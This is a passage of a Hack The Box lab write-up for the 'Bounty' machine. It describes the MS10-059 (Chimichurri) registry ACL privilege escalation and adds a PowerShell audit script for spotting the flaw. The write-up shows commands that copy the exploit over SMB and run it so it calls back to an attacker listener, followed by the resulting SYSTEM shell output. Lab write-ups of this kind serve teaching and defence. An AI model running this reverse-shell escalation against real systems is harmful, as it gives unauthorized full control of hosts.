CVE-2010-2554 (Chimichurri)


The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 has incorrect ACLs on its registry keys, which allows local users to gain privileges via vectors involving a named pipe and impersonation, aka “Tracing Registry Key ACL Vulnerability.”

This vulnerability is also known as MS10-059, as can be seen in the Microsoft bulletin above.

Microsoft also published a list of affected systems. It includes Server 2008 x64 SP2, which matches the target system.

According to Rapid7, an attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability.
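The flaw is a permissions defect rather than a code bug: the Tracing feature's registry keys carried ACEs that let ordinary local users modify them. An added audit script (not part of the original write-up, and not the exploit's code) that checks for that condition on a host is below. It assumes the key family the bulletin refers to is HKLM:\SOFTWARE\Microsoft\Tracing, and the list of "broad" principals that should never hold write rights there is a judgement call; adjust it to the environment.

```powershell
# Added audit script (not from the original write-up): list ACEs on the Tracing
# registry keys that grant modify rights to broad, low-privileged principals.
# Assumptions: HKLM:\SOFTWARE\Microsoft\Tracing is the key family MS10-059
# concerns; which principals count as "broad" is a judgement call.

$root = 'HKLM:\SOFTWARE\Microsoft\Tracing'

# Principals that should never be able to change these keys.
$broadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a caller change the key, its values, or its DACL.
$writeMask = [int]([System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership')

# Generic rights (GENERIC_ALL / GENERIC_WRITE) can appear raw on ACEs read
# through .NET; treat either as a write grant.
$genericWrite = 0x10000000 -bor 0x40000000

function Test-WriteAce {
    param([System.Security.AccessControl.RegistryAccessRule]$Ace)
    if ($Ace.AccessControlType -ne 'Allow') { return $false }
    $bits = [int]$Ace.RegistryRights
    return ((($bits -band $writeMask) -ne 0) -or (($bits -band $genericWrite) -ne 0))
}

# Walk the root key and every subkey (applications create their own subkeys here).
$keys = @(Get-Item -Path $root -ErrorAction SilentlyContinue) +
        @(Get-ChildItem -Path $root -Recurse -ErrorAction SilentlyContinue)

$findings = foreach ($key in $keys) {
    if (-not $key) { continue }
    $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
    if (-not $acl) { continue }
    foreach ($ace in $acl.Access) {
        if (($broadPrincipals -contains $ace.IdentityReference.Value) -and (Test-WriteAce -Ace $ace)) {
            [pscustomobject]@{
                Key       = $key.Name
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

if ($findings) {
    $findings | Format-Table -AutoSize
} else {
    "No write ACEs for broad principals found under $root"
}
```

Run it from a normal PowerShell session; reading HKLM and its DACLs does not need elevation. A host patched for MS10-059 should report nothing, since read access for interactive users is expected and only write-class rights are flagged. Any row it does print is a key a low-privileged logon could alter, which is the precondition the CVE text describes.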

I also found the exploit online. It is named Chimichurri.

PS C:\tmp> copy \\10.10.14.5\smb\1\MS10-059.exe
PS C:\tmp> .\MS10-059.exe
/chimichurri/-->this exploit gives you a local system shell <br>/chimichurri/-->usage: Chimichurri.exe ipaddress port <BR>
PS C:\tmp> .\MS10-059.exe 10.10.14.5 5555

I transferred the exploit over SMB. The help statement seemed straightforward, as the binary is the whole package, so I proceeded to execute it.

┌──(kali㉿kali)-[~/…/htb/labs/bounty/1]
└─$ nnc 5555  
listening on [any] 5555 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.93] 49177
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\tmp> whoami
nt authority\system
 
C:\tmp> hostname
bounty
 
C:\tmp> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.93
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
 
Tunnel adapter isatap.{27c3f487-28ac-4ce6-ae3a-1f23518ef7a7}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

I then received the shell as NT AUTHORITY\SYSTEM.

System Level Compromise